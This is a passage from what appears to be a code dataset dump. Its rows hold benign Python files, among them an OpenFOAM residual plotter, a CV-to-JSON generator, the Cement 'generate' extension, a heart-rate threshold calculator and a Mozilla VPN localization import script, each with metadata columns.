# Get the residual values for each variable
for variable in variables:
data = []
for line in lines:
if re.search(r"Solving for " + variable, line):# Search for string variable in line of file 'log_file'
start = 'Final residual = '
end = ', No Iterations'
value = line.split(start)[1].split(end)[0]
data.append(np.float(value))
plt.plot(np.array(time),np.array(data), label=variable) # Plot the residual values of variable
plt.plot(np.array(time),np.array(continuity), label="Continuity") # Plot the continuity values
# Plot
plt.title("Residuals plot:\n * logfile: " + log_file + "\n * case dir: " + os.getcwd().split('/')[-1], loc='left')
plt.xlabel("Time(s)/Iterations")
plt.ylabel("Residuals (Log Scale)")
plt.yscale('log')
plt.legend()
plt.grid()
plt.show()
| #!/usr/bin/env python
# encoding: utf-8
import sys
import getopt
import re
import os
import pylab as plt
import numpy as np
# Define the variables for which the residuals will be plotted
variables = ["Ux", "Uy", "T", "p_rgh", "k", "epsilon"]
# Get the arguments of the script
def usage():
print("Usage: residuals.py -l logfile\nPlot the residuals versus Time/Iteration")
try:
options, args = getopt.getopt(sys.argv[1:], 'l:h', ['help', 'logfile='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in options:
if opt in ("-l", "--logfile"):
log_file = arg
elif opt in ("-h", "--help"):
usage()
sys.exit(1)
# Get the lines of the logfile 'log_file'
lines = open(log_file, "r" ).readlines()
# Get the time and continuity values
time = [] # Time(s) or iterations counter
continuity = [] # Continuity values
for line in lines:
if re.search(r"^Time = ", line): # Search for string 'Time' at the begining of the line in file
start = 'Time = '
value = line.split(start)[1] # Take the Time value as the string just after start
time.append(np.float(value)) # Transform the string in a float value
elif re.search(r"continuity errors :", line): # Search for string 'continuity' in the lines of file 'log_file'
start = 'sum local = '
end = ', global'
value = line.split(start)[1].split(end)[0] # Take the continuity value as string between start and end
continuity.append(np.float(value)) # Transform the string in a float value
# Get the residual values for each variable
for variable in variables:
data = []
for line in lines:
if re.search(r"Solving for " + variable, line):# Search for string variable in line of file 'log_file'
start = 'Final residual = '
end = ', No Iterations'
value = line.split(start)[1].split(end)[0]
data.append(np.float(value))
plt.plot(np.array(time),np.array(data), label=variable) # Plot the residual values of variable
plt.plot(np.array(time),np.array(continuity), label="Continuity") # Plot the continuity values
# Plot
plt.title("Residuals plot:\n * logfile: " + log_file + "\n * case dir: " + os.getcwd().split('/')[-1], loc='left')
plt.xlabel("Time(s)/Iterations")
plt.ylabel("Residuals (Log Scale)")
plt.yscale('log')
plt.legend()
plt.grid()
plt.show() | en | 0.663672 | #!/usr/bin/env python # encoding: utf-8 # Define the variables for which the residuals will be plotted # Get the arguments of the script # Get the lines of the logfile 'log_file' # Get the time and continuity values # Time(s) or iterations counter # Continuity values # Search for string 'Time' at the begining of the line in file # Take the Time value as the string just after start # Transform the string in a float value # Search for string 'continuity' in the lines of file 'log_file' # Take the continuity value as string between start and end # Transform the string in a float value # Get the residual values for each variable # Search for string variable in line of file 'log_file' # Plot the residual values of variable # Plot the continuity values # Plot | 3.041201 | 3 |
content_generator/vitae.py | empiricalstateofmind/personal_website | 0 | 8582 | <reponame>empiricalstateofmind/personal_website
# Generate the vitae.json file used to populate the Vitae section of the website.
import pandas as pd
import re
from datetime import datetime
from collections import defaultdict
import json
# Publications
def create_publications(filepath):
publications = pd.read_excel(filepath, sheet_name='publications', endcoding='utf-8')
publications = publications.fillna('')
publication_store = defaultdict(list)
for ix, pub in publications.iterrows():
date = pub.publication_date.strftime('%Y')
entry = {'title': pub.title,
'authors': pub.authors,
'arxiv': pub.arxiv_link,
'abstract':pub.abstract,
'date': date}
if pub.journal_link != '':
entry['link'] = pub.journal_link
if pub.journal != '':
entry['journal'] = pub.journal
publication_store[pub.type].append(entry)
return publication_store
def create_conferences(filepath):
conferences = pd.read_excel(filepath, sheet_name='conferences', endcoding='utf-8')
conferences = conferences.fillna('')
categories = [('invited', 'Invited Talks \& Posters'),
('contributed', 'Contributed Talks \& Posters'),
('attended', 'Attended'),
('school', 'Schools')]
conference_store = {}
for key, subtitle in categories:
data = conferences[conferences.type == key]
collection = []
if len(data) > 0:
for ix, conf in data.iterrows():
if conf.include=='no': continue
date = conf.timestamp.strftime('%b. %Y')
if key in ['attended', 'school']:
contribution = 'Attendee'
else:
contribution = "{} {}".format(conf.type.capitalize(), conf.medium.capitalize())
entry = {'title':conf.title,
'location':conf.location,
'date':date,
'contribution': contribution,
}
if conf.link != '':
entry['link'] = conf.link
if (conf.presentation_title != '') & (conf.presentation_authors != ''):
entry['presentation_authors'] = conf.presentation_authors
entry['presentation_title'] = conf.presentation_title
collection.append(entry)
conference_store[key] = collection
return conference_store
def create_teaching(filepath):
teaching = pd.read_excel(filepath, sheet_name='teaching', endcoding='utf-8')
teaching = teaching.fillna('')
teaching_store = []
for ix, teach in teaching.sort_values(by='type').iterrows():
if teach['type'] == 'supervision':
entry = {
'date': teach.date,
'project_award': teach.program,
'title': teach.title,
'student': teach.student_name,
'institution': teach.location
}
teaching_store.append(entry)
return teaching_store
def create_reviewing(filepath):
reviewing = pd.read_excel(filepath, sheet_name='journals', endcoding='utf-8')
reviewing = reviewing.fillna('')
review_store = []
for ix, review in reviewing.iterrows():
entry = {'name': review.journal_name,
'short_name': review.journal_shortname}
review_store.append(entry)
return review_store
if __name__ == "__main__":
# FILEPATH = "D:/Dropbox/projects/personal_cv/vitae.xlsx" # We can pass this as an argument later
FILEPATH = "../../../Projects/personal_cv/vitae.xlsx"
vitae = {'publications':create_publications(FILEPATH),
'conferences':create_conferences(FILEPATH),
'teaching':create_teaching(FILEPATH),
'reviewing':create_reviewing(FILEPATH)}
with open('../app/mod_home/static/vitae.json', 'w') as file:
json.dump(vitae, file, sort_keys=True, indent=4)
with open('../app/static/vitae.json', 'w') as file:
json.dump(vitae, file, sort_keys=True, indent=4) | # Generate the vitae.json file used to populate the Vitae section of the website.
import pandas as pd
import re
from datetime import datetime
from collections import defaultdict
import json
# Publications
def create_publications(filepath):
publications = pd.read_excel(filepath, sheet_name='publications', endcoding='utf-8')
publications = publications.fillna('')
publication_store = defaultdict(list)
for ix, pub in publications.iterrows():
date = pub.publication_date.strftime('%Y')
entry = {'title': pub.title,
'authors': pub.authors,
'arxiv': pub.arxiv_link,
'abstract':pub.abstract,
'date': date}
if pub.journal_link != '':
entry['link'] = pub.journal_link
if pub.journal != '':
entry['journal'] = pub.journal
publication_store[pub.type].append(entry)
return publication_store
def create_conferences(filepath):
conferences = pd.read_excel(filepath, sheet_name='conferences', endcoding='utf-8')
conferences = conferences.fillna('')
categories = [('invited', 'Invited Talks \& Posters'),
('contributed', 'Contributed Talks \& Posters'),
('attended', 'Attended'),
('school', 'Schools')]
conference_store = {}
for key, subtitle in categories:
data = conferences[conferences.type == key]
collection = []
if len(data) > 0:
for ix, conf in data.iterrows():
if conf.include=='no': continue
date = conf.timestamp.strftime('%b. %Y')
if key in ['attended', 'school']:
contribution = 'Attendee'
else:
contribution = "{} {}".format(conf.type.capitalize(), conf.medium.capitalize())
entry = {'title':conf.title,
'location':conf.location,
'date':date,
'contribution': contribution,
}
if conf.link != '':
entry['link'] = conf.link
if (conf.presentation_title != '') & (conf.presentation_authors != ''):
entry['presentation_authors'] = conf.presentation_authors
entry['presentation_title'] = conf.presentation_title
collection.append(entry)
conference_store[key] = collection
return conference_store
def create_teaching(filepath):
teaching = pd.read_excel(filepath, sheet_name='teaching', endcoding='utf-8')
teaching = teaching.fillna('')
teaching_store = []
for ix, teach in teaching.sort_values(by='type').iterrows():
if teach['type'] == 'supervision':
entry = {
'date': teach.date,
'project_award': teach.program,
'title': teach.title,
'student': teach.student_name,
'institution': teach.location
}
teaching_store.append(entry)
return teaching_store
def create_reviewing(filepath):
reviewing = pd.read_excel(filepath, sheet_name='journals', endcoding='utf-8')
reviewing = reviewing.fillna('')
review_store = []
for ix, review in reviewing.iterrows():
entry = {'name': review.journal_name,
'short_name': review.journal_shortname}
review_store.append(entry)
return review_store
if __name__ == "__main__":
# FILEPATH = "D:/Dropbox/projects/personal_cv/vitae.xlsx" # We can pass this as an argument later
FILEPATH = "../../../Projects/personal_cv/vitae.xlsx"
vitae = {'publications':create_publications(FILEPATH),
'conferences':create_conferences(FILEPATH),
'teaching':create_teaching(FILEPATH),
'reviewing':create_reviewing(FILEPATH)}
with open('../app/mod_home/static/vitae.json', 'w') as file:
json.dump(vitae, file, sort_keys=True, indent=4)
with open('../app/static/vitae.json', 'w') as file:
json.dump(vitae, file, sort_keys=True, indent=4) | en | 0.833035 | # Generate the vitae.json file used to populate the Vitae section of the website. # Publications # FILEPATH = "D:/Dropbox/projects/personal_cv/vitae.xlsx" # We can pass this as an argument later | 2.845157 | 3 |
cement/ext/ext_generate.py | tomekr/cement | 826 | 8583 | """
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
msg = 'unable to load template module' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
| """
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
msg = 'unable to load template module' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
| en | 0.286571 | Cement generate extension module. # builtin vars # default ignore the .generate.yml config # pragma: nocover # pragma: nocover # pragma: nocover # look in app template dirs # use app template module, find it's path on filesystem # FIXME: not exactly sure how to test for this so not covering # pragma: nocover # pragma: nocover # pragma: nocover # ------------------------------------------------------ # ------------------------------------------------------ # ------------------------------------------------------ # ------------------------------------------------------ | 2.297929 | 2 |
ditto/core/__init__.py | Kvoti/ditto | 0 | 8584 | from . import forms
from . import views
ADMIN_ROLE = "Administrator"
MEMBER_ROLE = "Member"
GUEST_ROLE = "Guest"
DEFAULT_ROLES = [ADMIN_ROLE, MEMBER_ROLE, GUEST_ROLE]
| from . import forms
from . import views
ADMIN_ROLE = "Administrator"
MEMBER_ROLE = "Member"
GUEST_ROLE = "Guest"
DEFAULT_ROLES = [ADMIN_ROLE, MEMBER_ROLE, GUEST_ROLE]
| none | 1 | 1.279923 | 1 |
|
training_stats/hrm.py | salwator/training_stats | 4 | 8585 | from .gpxfile import get_hr_measurements
from .utils import interpolate
from operator import itemgetter
def __calculate_moving_sums(points, window):
""" Calculates hr moving sums of the window len """
time, hrs = zip(*points)
moving_sum = sum(hrs[0:window])
sums = [(time[0], moving_sum)]
for i, t in enumerate(time[1:-1 * window]):
moving_sum += hrs[i + window] - hrs[i]
sums.append((t, moving_sum))
return sums
def calculate_lactate_threshold(hrdata):
""" Given list of (time, hr), returns lactate threshold and selected data"""
test_period = 60 * 30 # test time
measured_period = 60 * 20 # measured period in seconds
hrs = interpolate(hrdata)
time_stamp, max_sum = max(__calculate_moving_sums(hrs, test_period),
key=itemgetter(1))
# your lactate threshold is average of last 20 in 30 minutes of tempo run
start_measure = time_stamp + (test_period - measured_period)
stop_measure = start_measure + measured_period
measured_time, measured_hrs = zip(*hrs[start_measure:stop_measure])
lactate_thr = round(sum(measured_hrs) / measured_period)
return (lactate_thr, measured_time, measured_hrs)
| from .gpxfile import get_hr_measurements
from .utils import interpolate
from operator import itemgetter
def __calculate_moving_sums(points, window):
""" Calculates hr moving sums of the window len """
time, hrs = zip(*points)
moving_sum = sum(hrs[0:window])
sums = [(time[0], moving_sum)]
for i, t in enumerate(time[1:-1 * window]):
moving_sum += hrs[i + window] - hrs[i]
sums.append((t, moving_sum))
return sums
def calculate_lactate_threshold(hrdata):
""" Given list of (time, hr), returns lactate threshold and selected data"""
test_period = 60 * 30 # test time
measured_period = 60 * 20 # measured period in seconds
hrs = interpolate(hrdata)
time_stamp, max_sum = max(__calculate_moving_sums(hrs, test_period),
key=itemgetter(1))
# your lactate threshold is average of last 20 in 30 minutes of tempo run
start_measure = time_stamp + (test_period - measured_period)
stop_measure = start_measure + measured_period
measured_time, measured_hrs = zip(*hrs[start_measure:stop_measure])
lactate_thr = round(sum(measured_hrs) / measured_period)
return (lactate_thr, measured_time, measured_hrs)
| en | 0.833944 | Calculates hr moving sums of the window len Given list of (time, hr), returns lactate threshold and selected data # test time # measured period in seconds # your lactate threshold is average of last 20 in 30 minutes of tempo run | 3.121937 | 3 |
scripts/utils/import_languages.py | mozilla-releng/staging-mozilla-vpn-client | 0 | 8586 | #! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import xml.etree.ElementTree as ET
import os
import sys
import shutil
import atexit
import subprocess
# Use the project root as the working directory
prevdir = os.getcwd()
workdir = os.path.join(os.path.dirname(__file__), '..', '..')
os.chdir(workdir)
atexit.register(os.chdir, prevdir)
# Include only locales above this threshold (e.g. 70%) in production
l10n_threshold = 0.70
parser = argparse.ArgumentParser()
parser.add_argument(
'-m', '--macos', default=False, action="store_true", dest="ismacos",
help='Include the MacOS bundle data')
parser.add_argument(
'-q', '--qt_path', default=None, dest="qtpath",
help='The QT binary path. If not set, we try to guess.')
args = parser.parse_args()
stepnum = 1
def title(text):
global stepnum
print(f"\033[96m\033[1mStep {stepnum}\033[0m: \033[97m{text}\033[0m")
stepnum = stepnum+1
# Step 0
title("Find the Qt localization tools...")
def qtquery(qmake, propname):
try:
qtquery = os.popen(f'{qmake} -query {propname}')
qtpath = qtquery.read().strip()
if len(qtpath) > 0:
return qtpath
finally:
pass
return None
qtbinpath = args.qtpath
if qtbinpath is None:
qtbinpath = qtquery('qmake', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake6', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake5', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake-qt5', 'QT_INSTALL_BINS')
if qtbinpath is None:
print('Unable to locate qmake tool.')
sys.exit(1)
if not os.path.isdir(qtbinpath):
print(f"QT path is not a diretory: {qtbinpath}")
sys.exit(1)
lupdate = os.path.join(qtbinpath, 'lupdate')
lconvert = os.path.join(qtbinpath, 'lconvert')
lrelease = os.path.join(qtbinpath, 'lrelease')
# Step 0
# Let's update the i18n repo
os.system(f"git submodule init")
os.system(f"git submodule update --remote --depth 1 i18n")
# Step 1
# Go through the i18n repo, check each XLIFF file and take
# note which locale is complete above the minimum threshold.
# Adds path of .xliff and .ts to l10n_files.
title("Validate the XLIFF file...")
l10n_files = []
for locale in os.listdir('i18n'):
# Skip non folders
if not os.path.isdir(os.path.join('i18n', locale)):
continue
# Skip hidden folders
if locale.startswith('.'):
continue
xliff_path = os.path.join('i18n', locale, 'mozillavpn.xliff')
# If it's the source locale (en), ignore parsing for completeness and
# add it to the list.
if locale == 'en':
print(f'OK\t- en added (reference locale)')
l10n_files.append({
'locale': 'en',
'ts': os.path.join('translations', 'generated', 'mozillavpn_en.ts'),
'xliff': xliff_path
})
continue
tree = ET.parse(xliff_path)
root = tree.getroot()
sources = 0
translations = 0
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}source'):
sources += 1
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}target'):
translations += 1
completeness = translations/(sources*1.0)
# Ignore locale with less than 70% of completeness
if completeness < l10n_threshold:
print(f'KO\t- {locale} is translated at {round(completeness*100, 2)}%, at least {l10n_threshold*100}% is needed')
continue # Not enough translations next file please
print(f'OK\t- {locale} added ({round(completeness*100, 2)}% translated)')
l10n_files.append({
'locale': locale,
'ts': os.path.join('translations', 'generated', f'mozillavpn_{locale}.ts'),
'xliff': xliff_path
})
# Step 2
title("Create folders and localization files for the languages...")
for file in l10n_files:
locdirectory = os.path.join('translations', 'generated', file['locale'])
os.makedirs(locdirectory, exist_ok=True)
locversion = os.path.join(locdirectory, f'locversion.plist')
with open(locversion, 'w') as locversion_file:
locversion_file.write(f"""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>LprojCompatibleVersion</key>
<string>123</string>
<key>LprojLocale</key>
<string>{file['locale']}</string>
<key>LprojRevisionLevel</key>
<string>1</string>
<key>LprojVersion</key>
<string>123</string>
</dict>
</plist>""")
with open(os.path.join('translations', 'generated', 'macos.pri'), 'w') as macospri:
macospri.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
for file in l10n_files:
macospri.write(f"LANGUAGES_FILES_{file['locale']}.files += $$PWD/{file['locale']}/locversion.plist\n")
macospri.write(f"LANGUAGES_FILES_{file['locale']}.path = Contents/Resources/{file['locale']}.lproj\n")
macospri.write(f"QMAKE_BUNDLE_DATA += LANGUAGES_FILES_{file['locale']}\n\n")
# Step 3
title("Write resource file to import the locales that are ready...")
with open('translations/generated/translations.qrc', 'w') as qrcfile:
qrcfile.write('<!-- AUTOGENERATED! DO NOT EDIT!! -->\n')
qrcfile.write('<RCC>\n')
qrcfile.write(' <qresource prefix="/i18n">\n')
for file in l10n_files:
qrcfile.write(f' <file>mozillavpn_{file["locale"]}.qm</file>\n')
qrcfile.write(' </qresource>\n')
qrcfile.write('</RCC>\n')
# Step 4
title("Generate the Js/C++ string definitions...")
try:
subprocess.call([sys.executable, os.path.join('scripts', 'utils', 'generate_strings.py'),
'-o', os.path.join('translations', 'generated'),
os.path.join('translations', 'strings.yaml')])
except Exception as e:
print("generate_strings.py failed. Try with:\n\tpip3 install -r requirements.txt --user")
print(e)
exit(1)
# Build a dummy project to glob together everything that might contain strings.
title("Scanning for new strings...")
def scan_sources(projfile, dirpath):
projfile.write(f"HEADERS += $$files({dirpath}/*.h, true)\n")
projfile.write(f"SOURCES += $$files({dirpath}/*.cpp, true)\n")
projfile.write(f"RESOURCES += $$files({dirpath}/*.qrc, true)\n\n")
with open('translations/generated/dummy.pro', 'w') as dummyproj:
dummyproj.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
dummyproj.write(f"HEADERS += l18nstrings.h\n")
dummyproj.write(f"SOURCES += l18nstrings_p.cpp\n")
dummyproj.write(f"SOURCES += ../l18nstrings.cpp\n\n")
for l10n_file in l10n_files:
dummyproj.write(f"TRANSLATIONS += {os.path.basename(l10n_file['ts'])}\n")
dummyproj.write("\n")
scan_sources(dummyproj, '../../src')
scan_sources(dummyproj, '../../nebula')
# Step 5
title("Generate translation resources...")
for l10n_file in l10n_files:
os.system(f"{lconvert} -if xlf -i {l10n_file['xliff']} -o {l10n_file['ts']}")
os.system(f"{lupdate} translations/generated/dummy.pro")
for l10n_file in l10n_files:
os.system(f"{lrelease} -idbased {l10n_file['ts']}")
print(f'Imported {len(l10n_files)} locales')
git = os.popen(f'git submodule status i18n')
git_commit_hash = git.read().strip().replace("+","").split(' ')[0]
print(f'Current commit: https://github.com/mozilla-l10n/mozilla-vpn-client-l10n/commit/{git_commit_hash}')
| #! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import xml.etree.ElementTree as ET
import os
import sys
import shutil
import atexit
import subprocess
# Use the project root as the working directory
prevdir = os.getcwd()
workdir = os.path.join(os.path.dirname(__file__), '..', '..')
os.chdir(workdir)
atexit.register(os.chdir, prevdir)
# Include only locales above this threshold (e.g. 70%) in production
l10n_threshold = 0.70
parser = argparse.ArgumentParser()
parser.add_argument(
'-m', '--macos', default=False, action="store_true", dest="ismacos",
help='Include the MacOS bundle data')
parser.add_argument(
'-q', '--qt_path', default=None, dest="qtpath",
help='The QT binary path. If not set, we try to guess.')
args = parser.parse_args()
stepnum = 1
def title(text):
global stepnum
print(f"\033[96m\033[1mStep {stepnum}\033[0m: \033[97m{text}\033[0m")
stepnum = stepnum+1
# Step 0
title("Find the Qt localization tools...")
def qtquery(qmake, propname):
try:
qtquery = os.popen(f'{qmake} -query {propname}')
qtpath = qtquery.read().strip()
if len(qtpath) > 0:
return qtpath
finally:
pass
return None
qtbinpath = args.qtpath
if qtbinpath is None:
qtbinpath = qtquery('qmake', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake6', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake5', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake-qt5', 'QT_INSTALL_BINS')
if qtbinpath is None:
print('Unable to locate qmake tool.')
sys.exit(1)
if not os.path.isdir(qtbinpath):
print(f"QT path is not a diretory: {qtbinpath}")
sys.exit(1)
lupdate = os.path.join(qtbinpath, 'lupdate')
lconvert = os.path.join(qtbinpath, 'lconvert')
lrelease = os.path.join(qtbinpath, 'lrelease')
# Step 0
# Let's update the i18n repo
os.system(f"git submodule init")
os.system(f"git submodule update --remote --depth 1 i18n")
# Step 1
# Go through the i18n repo, check each XLIFF file and take
# note which locale is complete above the minimum threshold.
# Adds path of .xliff and .ts to l10n_files.
title("Validate the XLIFF file...")
l10n_files = []
for locale in os.listdir('i18n'):
# Skip non folders
if not os.path.isdir(os.path.join('i18n', locale)):
continue
# Skip hidden folders
if locale.startswith('.'):
continue
xliff_path = os.path.join('i18n', locale, 'mozillavpn.xliff')
# If it's the source locale (en), ignore parsing for completeness and
# add it to the list.
if locale == 'en':
print(f'OK\t- en added (reference locale)')
